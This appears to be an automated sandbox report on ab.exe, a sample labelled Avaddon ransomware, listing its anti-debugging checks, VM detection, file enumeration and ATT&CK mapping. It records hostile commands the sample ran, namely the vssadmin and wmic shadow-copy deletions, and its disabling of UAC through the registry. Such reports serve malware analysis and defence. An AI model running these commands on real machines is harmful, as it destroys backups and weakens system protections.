Source: C:\Users\user\Desktop\ab.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\ab.exe

Code function: 2_2_0130A220 GetSystemInfo,

2_2_0130A220

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\ab.exe

Code function: 2_2_0130D280 FindFirstFileW,FindNextFileW,FindClose,

2_2_0130D280

Source: C:\Users\user\Desktop\ab.exe	File Volume queried: C:\ FullSizeInformation			Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	File Volume queried: C:\ FullSizeInformation			Jump to behavior

Source: ab.exe, 00000000.00000003.274696444.00000000007F7000.00000004.00000001.sdmp	Binary or memory string: ??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{e6e9dfd8-98f2-11e9-90ce-806e6f6e6963}\DosDevices\D:
Source: ab.exe, 00000000.00000003.354766251.00000000007E5000.00000004.00000001.sdmp	Binary or memory string: VMwareHostd,l
Source: ab.exe, 00000000.00000003.354766251.00000000007E5000.00000004.00000001.sdmp	Binary or memory string: VMnetDHCPhlW
Source: ab.exe, 00000000.00000003.354766251.00000000007E5000.00000004.00000001.sdmp	Binary or memory string: VMnetDHCP
Source: ab.exe, 00000000.00000003.354766251.00000000007E5000.00000004.00000001.sdmp	Binary or memory string: VMwareHostdSll
Source: ab.exe, 00000000.00000003.313647410.0000000000828000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Anti Debugging:

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Show sources

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\ab.exe

Code function: 2_2_012FA100 IsDebuggerPresent,GetCurrentProcess,CheckRemoteDebuggerPresent,GetCurrentThread,GetThreadContext,

2_2_012FA100

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\ab.exe

Code function: 2_2_012FA100 IsDebuggerPresent,GetCurrentProcess,CheckRemoteDebuggerPresent,GetCurrentThread,GetThreadContext,

2_2_012FA100

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\ab.exe

Code function: 2_2_012FC0AA GetProcessHeap,HeapFree,

2_2_012FC0AA

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\ab.exe	Code function: 2_2_013565AB mov eax, dword ptr fs:[00000030h]	2_2_013565AB
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\ab.exe	Code function: 2_2_013565EF mov eax, dword ptr fs:[00000030h]	2_2_013565EF
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\ab.exe	Code function: 2_2_01352C19 mov eax, dword ptr fs:[00000030h]	2_2_01352C19

Source: C:\Users\user\Desktop\ab.exe

Process queried: DebugPort

Jump to behavior

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\ab.exe	Code function: 2_2_0132EAEB SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		2_2_0132EAEB
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\ab.exe	Code function: 2_2_0134950E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,		2_2_0134950E

Source: C:\Users\user\Desktop\ab.exe	Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic SHADOWCOPY DELETE /nointeractive	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	Process created: C:\Windows\SysWOW64\vssadmin.exe vssadmin Delete Shadows /All /Quiet	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic SHADOWCOPY DELETE /nointeractive	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	Process created: C:\Windows\SysWOW64\vssadmin.exe vssadmin Delete Shadows /All /Quiet	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic SHADOWCOPY DELETE /nointeractive	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	Process created: C:\Windows\SysWOW64\vssadmin.exe vssadmin Delete Shadows /All /Quiet	Jump to behavior

Source: C:\Users\user\Desktop\ab.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	Queries volume information: C:\Users\user\Desktop\BNAGMGSPLO.jpg VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	Queries volume information: C:\Users\user\Desktop\EFOYFBOLXA.jpg VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	Queries volume information: C:\Users\user\Desktop\EEGWXUHVUG.png VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	Queries volume information: C:\Users\user\Desktop\EFOYFBOLXA.mp3 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	Queries volume information: C:\Users\user\Desktop\GAOBCVIQIJ.docx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	Queries volume information: C:\Users\user\Desktop\GAOBCVIQIJ.pdf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	Queries volume information: C:\Users\user\Desktop\GAOBCVIQIJ\GAOBCVIQIJ.docx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	Queries volume information: C:\Users\user\Desktop\GAOBCVIQIJ\BNAGMGSPLO.jpg VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	Queries volume information: C:\Users\user\Desktop\LSBIHQFDVT\QCFWYSKMHA.png VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	Queries volume information: C:\Users\user\Desktop\LSBIHQFDVT\PWCCAWLGRE.mp3 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	Queries volume information: C:\Users\user\Desktop\GAOBCVIQIJ\EFOYFBOLXA.mp3 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	Queries volume information: C:\Users\user\Desktop\GAOBCVIQIJ\QCFWYSKMHA.xlsx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	Queries volume information: C:\Users\user\Desktop\GAOBCVIQIJ\EEGWXUHVUG.png VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	Queries volume information: C:\Users\user\Desktop\GAOBCVIQIJ\SUAVTZKNFL.pdf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	Queries volume information: C:\Users\user\Desktop\LSBIHQFDVT\GAOBCVIQIJ.pdf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	Queries volume information: C:\Users\user\Desktop\LSBIHQFDVT\QNCYCDFIJJ.jpg VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	Queries volume information: C:\Users\user\Desktop\LSBIHQFDVT\LSBIHQFDVT.docx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	Queries volume information: C:\Users\user\Desktop\LSBIHQFDVT\ZQIXMVQGAH.xlsx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	Queries volume information: C:\Users\user\Desktop\LSBIHQFDVT.docx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	Queries volume information: C:\Users\user\Desktop\PWCCAWLGRE.mp3 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	Queries volume information: C:\Users\user\Desktop\PALRGUCVEH.png VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	Queries volume information: C:\Users\user\Desktop\QCFWYSKMHA.png VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	Queries volume information: C:\Users\user\Desktop\QCFWYSKMHA.xlsx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	Queries volume information: C:\Users\user\Desktop\QNCYCDFIJJ\EFOYFBOLXA.jpg VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	Queries volume information: C:\Users\user\Desktop\QNCYCDFIJJ\PALRGUCVEH.png VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	Queries volume information: C:\Users\user\Desktop\QNCYCDFIJJ\QNCYCDFIJJ.docx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	Queries volume information: C:\Users\user\Desktop\QNCYCDFIJJ\SQSJKEBWDT.pdf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	Queries volume information: C:\Users\user\Desktop\QNCYCDFIJJ\SUAVTZKNFL.xlsx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	Queries volume information: C:\Users\user\Desktop\QNCYCDFIJJ.docx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	Queries volume information: C:\Users\user\Desktop\QNCYCDFIJJ.jpg VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	Queries volume information: C:\Users\user\Desktop\QNCYCDFIJJ\ZGGKNSUKOP.mp3 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	Queries volume information: C:\Users\user\Desktop\SUAVTZKNFL.xlsx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	Queries volume information: C:\Users\user\Desktop\SQSJKEBWDT.pdf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	Queries volume information: C:\Users\user\Desktop\SUAVTZKNFL.pdf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	Queries volume information: C:\Users\user\Desktop\ZGGKNSUKOP.mp3 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	Queries volume information: C:\Users\user\Desktop\ZQIXMVQGAH.xlsx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	Queries volume information: C:\Users\user\Documents\EFOYFBOLXA.jpg VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	Queries volume information: C:\Users\user\Documents\BNAGMGSPLO.jpg VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	Queries volume information: C:\Users\user\Documents\EEGWXUHVUG.png VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	Queries volume information: C:\Users\user\Documents\EFOYFBOLXA.mp3 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	Queries volume information: C:\Users\user\Documents\GAOBCVIQIJ\BNAGMGSPLO.jpg VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	Queries volume information: C:\Users\user\Documents\GAOBCVIQIJ\EEGWXUHVUG.png VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	Queries volume information: C:\Users\user\Documents\GAOBCVIQIJ\GAOBCVIQIJ.docx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	Queries volume information: C:\Users\user\Documents\GAOBCVIQIJ\QCFWYSKMHA.xlsx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	Queries volume information: C:\Users\user\Documents\GAOBCVIQIJ\EFOYFBOLXA.mp3 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	Queries volume information: C:\Users\user\Documents\GAOBCVIQIJ\SUAVTZKNFL.pdf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	Queries volume information: C:\Users\user\Documents\GAOBCVIQIJ.docx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	Queries volume information: C:\Users\user\Documents\LSBIHQFDVT\GAOBCVIQIJ.pdf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	Queries volume information: C:\Users\user\Documents\GAOBCVIQIJ.pdf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	Queries volume information: C:\Users\user\Documents\LSBIHQFDVT\LSBIHQFDVT.docx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	Queries volume information: C:\Users\user\Documents\LSBIHQFDVT\PWCCAWLGRE.png VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	Queries volume information: C:\Users\user\Documents\LSBIHQFDVT\QCFWYSKMHA.jpg VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	Queries volume information: C:\Users\user\Documents\LSBIHQFDVT\SUAVTZKNFL.mp3 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	Queries volume information: C:\Users\user\Documents\LSBIHQFDVT\ZQIXMVQGAH.xlsx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	Queries volume information: C:\Users\user\Documents\PWCCAWLGRE.mp3 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	Queries volume information: C:\Users\user\Documents\LSBIHQFDVT.docx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	Queries volume information: C:\Users\user\Documents\PALRGUCVEH.png VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	Queries volume information: C:\Users\user\Documents\QCFWYSKMHA.png VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	Queries volume information: C:\Users\user\Documents\QCFWYSKMHA.xlsx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	Queries volume information: C:\Users\user\Documents\QNCYCDFIJJ\EFOYFBOLXA.jpg VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	Queries volume information: C:\Users\user\Documents\QNCYCDFIJJ\PALRGUCVEH.png VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	Queries volume information: C:\Users\user\Documents\QNCYCDFIJJ\QNCYCDFIJJ.docx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	Queries volume information: C:\Users\user\Documents\QNCYCDFIJJ\SQSJKEBWDT.pdf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	Queries volume information: C:\Users\user\Documents\QNCYCDFIJJ\SUAVTZKNFL.xlsx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	Queries volume information: C:\Users\user\Documents\QNCYCDFIJJ\ZGGKNSUKOP.mp3 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	Queries volume information: C:\Users\user\Documents\QNCYCDFIJJ.docx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	Queries volume information: C:\Users\user\Documents\QNCYCDFIJJ.jpg VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	Queries volume information: C:\Users\user\Documents\SQSJKEBWDT.pdf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	Queries volume information: C:\Users\user\Documents\SUAVTZKNFL.pdf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	Queries volume information: C:\Users\user\Downloads\EFOYFBOLXA.mp3 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	Queries volume information: C:\Users\user\Documents\SUAVTZKNFL.xlsx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	Queries volume information: C:\Users\user\Downloads\EFOYFBOLXA.jpg VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	Queries volume information: C:\Users\user\Downloads\BNAGMGSPLO.jpg VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	Queries volume information: C:\Users\user\Downloads\EEGWXUHVUG.png VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	Queries volume information: C:\Users\user\Documents\ZQIXMVQGAH.xlsx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	Queries volume information: C:\Users\user\Downloads\PWCCAWLGRE.png VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	Queries volume information: C:\Users\user\Downloads\GAOBCVIQIJ.docx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	Queries volume information: C:\Users\user\Downloads\PALRGUCVEH.png VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	Queries volume information: C:\Users\user\Downloads\QCFWYSKMHA.jpg VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	Queries volume information: C:\Users\user\Downloads\QNCYCDFIJJ.docx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	Queries volume information: C:\Users\user\Documents\ZGGKNSUKOP.mp3 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	Queries volume information: C:\Users\user\Downloads\QNCYCDFIJJ.pdf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	Queries volume information: C:\Users\user\Downloads\GAOBCVIQIJ.xlsx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	Queries volume information: C:\Users\user\Downloads\QCFWYSKMHA.xlsx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	Queries volume information: C:\Users\user\Downloads\SQSJKEBWDT.pdf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	Queries volume information: C:\Users\user\Downloads\SUAVTZKNFL.mp3 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	Queries volume information: C:\Users\user\Downloads\SUAVTZKNFL.pdf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	Queries volume information: C:\Users\user\Downloads\SUAVTZKNFL.xlsx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	Queries volume information: C:\Users\user\Downloads\ZGGKNSUKOP.mp3 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	Queries volume information: C:\Users\user\Downloads\ZQIXMVQGAH.docx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	Queries volume information: C:\Users\user\Favorites\Amazon.url VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	Queries volume information: C:\Users\user\Favorites\Bing.url VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	Queries volume information: C:\Users\user\Favorites\Facebook.url VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	Queries volume information: C:\Users\user\Favorites\Google.url VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	Queries volume information: C:\Users\user\Favorites\Live.url VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	Queries volume information: C:\Users\user\Favorites\NYTimes.url VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	Queries volume information: C:\Users\user\Favorites\Reddit.url VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	Queries volume information: C:\Users\user\Favorites\Twitter.url VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	Queries volume information: C:\Users\user\Favorites\Wikipedia.url VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	Queries volume information: C:\Users\user\Favorites\Youtube.url VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	Queries volume information: C:\Users\user\Searches\Everywhere.search-ms VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	Queries volume information: C:\Users\user\Searches\Indexed Locations.search-ms VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\ab.exe	Queries volume information: C:\Users\Public\Libraries\RecordedTV.library-ms VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\ab.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\ab.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\ab.exe	Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	2_2_0135E284
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\ab.exe	Code function: GetLocaleInfoEx,GetLocaleInfoEx,GetLocaleInfoW,	2_2_0132E899
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\ab.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	2_2_0135EBE5
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\ab.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	2_2_0135EA10
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\ab.exe	Code function: GetLocaleInfoW,	2_2_0135628F
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\ab.exe	Code function: EnumSystemLocalesW,	2_2_0135E526
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\ab.exe	Code function: EnumSystemLocalesW,	2_2_0135E571
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\ab.exe	Code function: EnumSystemLocalesW,	2_2_01355CD6
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\ab.exe	Code function: GetLocaleInfoA,	2_2_01311F20
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\ab.exe	Code function: EnumSystemLocalesW,	2_2_0135E60C

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\ab.exe

Code function: 2_2_01306180 cpuid

2_2_01306180

Source: C:\Users\user\Desktop\ab.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\ab.exe

Code function: 2_2_0132F938 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

2_2_0132F938

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\ab.exe

Code function: 2_2_0135711A _free,_free,_free,GetTimeZoneInformation,_free,

2_2_0135711A

Lowering of HIPS / PFW / Operating System Security Settings:

Disables UAC (registry)

Show sources

Source: C:\Users\user\Desktop\ab.exe

Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System EnableLUA

Jump to behavior

Source: ab.exe, 00000000.00000003.324241984.00000000007E5000.00000004.00000001.sdmp, ab.exe, 00000000.00000003.315481275.00000000007E5000.00000004.00000001.sdmp, ab.exe, 00000000.00000003.349826144.00000000007E5000.00000004.00000001.sdmp, ab.exe, 00000000.00000003.354766251.00000000007E5000.00000004.00000001.sdmp	Binary or memory string: RTVscan.exe
Source: ab.exe, 00000000.00000003.324241984.00000000007E5000.00000004.00000001.sdmp, ab.exe, 00000000.00000003.315481275.00000000007E5000.00000004.00000001.sdmp, ab.exe, 00000000.00000003.349826144.00000000007E5000.00000004.00000001.sdmp, ab.exe, 00000000.00000003.354766251.00000000007E5000.00000004.00000001.sdmp	Binary or memory string: Defwatch.exe

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Replication Through Removable Media1	Windows Management Instrumentation11	Windows Service11	Access Token Manipulation1	Masquerading1	OS Credential Dumping	System Time Discovery2	Taint Shared Content1	Archive Collected Data11	Exfiltration Over Other Network Medium	Encrypted Channel2	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Data Encrypted for Impact11
Default Accounts	Scheduled Task/Job1	Scheduled Task/Job1	Windows Service11	Disable or Modify Tools1	LSASS Memory	Security Software Discovery241	Replication Through Removable Media1	Data from Removable Media	Exfiltration Over Bluetooth	Junk Data	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Service Execution12	DLL Side-Loading1	Process Injection11	Virtualization/Sandbox Evasion1	Security Account Manager	Virtualization/Sandbox Evasion1	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Steganography	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Scheduled Task/Job1	Access Token Manipulation1	NTDS	Process Discovery2	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	DLL Side-Loading1	Process Injection11	LSA Secrets	Peripheral Device Discovery11	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Deobfuscate/Decode Files or Information1	Cached Domain Credentials	File and Directory Discovery3	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Obfuscated Files or Information2	DCSync	System Information Discovery37	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	DLL Side-Loading1	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	File Deletion1	/etc/passwd and /etc/shadow	System Network Connections Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
ab.exe	88%	Virustotal		Browse
ab.exe	66%	Metadefender		Browse
ab.exe	96%	ReversingLabs	Win32.Ransomware.Avaddon
ab.exe	100%	Avira	HEUR/AGEN.1136765
ab.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\Microsoft\Windows\ab.exe	100%	Avira	HEUR/AGEN.1136765
C:\Users\user\AppData\Roaming\Microsoft\Windows\ab.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\Microsoft\Windows\ab.exe	88%	Virustotal		Browse
C:\Users\user\AppData\Roaming\Microsoft\Windows\ab.exe	66%	Metadefender		Browse
C:\Users\user\AppData\Roaming\Microsoft\Windows\ab.exe	96%	ReversingLabs	Win32.Ransomware.Avaddon

Unpacked PE Files

Source	Detection	Scanner	Label	Download
35.0.ab.exe.12f0000.0.unpack	100%	Avira	HEUR/AGEN.1136765	Download File
0.0.ab.exe.10e0000.0.unpack	100%	Avira	HEUR/AGEN.1136765	Download File
2.0.ab.exe.12f0000.0.unpack	100%	Avira	HEUR/AGEN.1136765	Download File
2.2.ab.exe.12f0000.0.unpack	100%	Avira	HEUR/AGEN.1136765	Download File
35.2.ab.exe.12f0000.0.unpack	100%	Avira	HEUR/AGEN.1136765	Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
https://www.torproject.o	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

No contacted domains info

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://www.torproject.o	ab.exe, 00000000.00000003.332133858.00000000043E8000.00000004.00000010.sdmp	true	Avira URL Cloud: safe	unknown
https://www.torproject.org/	ab.exe, 00000000.00000003.317616341.00000000043E9000.00000004.00000010.sdmp, ab.exe, 00000000.00000003.327252185.00000000043E9000.00000004.00000010.sdmp, ab.exe, 00000000.00000003.330084919.00000000043E9000.00000004.00000010.sdmp, ab.exe, 00000000.00000003.324632117.00000000043E9000.00000004.00000010.sdmp, ab.exe, 00000000.00000003.317257973.00000000043E8000.00000004.00000010.sdmp, ab.exe, 00000000.00000003.316985824.00000000043E8000.00000004.00000010.sdmp, ab.exe, 00000000.00000003.324241984.00000000007E5000.00000004.00000001.sdmp, ab.exe, 00000000.00000003.315481275.00000000007E5000.00000004.00000001.sdmp, ab.exe, 00000000.00000003.321019974.0000000004DB7000.00000004.00000010.sdmp, ab.exe, 00000000.00000003.349826144.00000000007E5000.00000004.00000001.sdmp, ab.exe, 00000000.00000003.354766251.00000000007E5000.00000004.00000001.sdmp, ab.exe, 00000000.00000003.321639243.0000000004DB7000.00000004.00000010.sdmp, ab.exe, 00000000.00000003.321699591.0000000004DB8000.00000004.00000010.sdmp, ab.exe, 00000000.00000003.316551039.00000000043E8000.00000004.00000010.sdmp, ab.exe, 00000000.00000003.321142835.0000000004DB7000.00000004.00000010.sdmp, ab.exe, 00000000.00000003.336845609.000000000083D000.00000004.00000001.sdmp, ab.exe, 00000000.00000003.324338080.000000000083D000.00000004.00000001.sdmp, uCLrcwQ_readme_.txt8.0.dr, uCLrcwQ_readme_.txt.0.dr, uCLrcwQ_readme_.txt5.0.dr, uCLrcwQ_readme_.txt10.0.dr, uCLrcwQ_readme_.txt9.0.dr, uCLrcwQ_readme_.txt4.0.dr, uCLrcwQ_readme_.txt2.0.dr, uCLrcwQ_readme_.txt6.0.dr, uCLrcwQ_readme_.txt1.0.dr, uCLrcwQ_readme_.txt7.0.dr, uCLrcwQ_readme_.txt0.0.dr, uCLrcwQ_readme_.txt3.0.dr	false		high

Contacted IPs

No contacted IP infos

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	548854
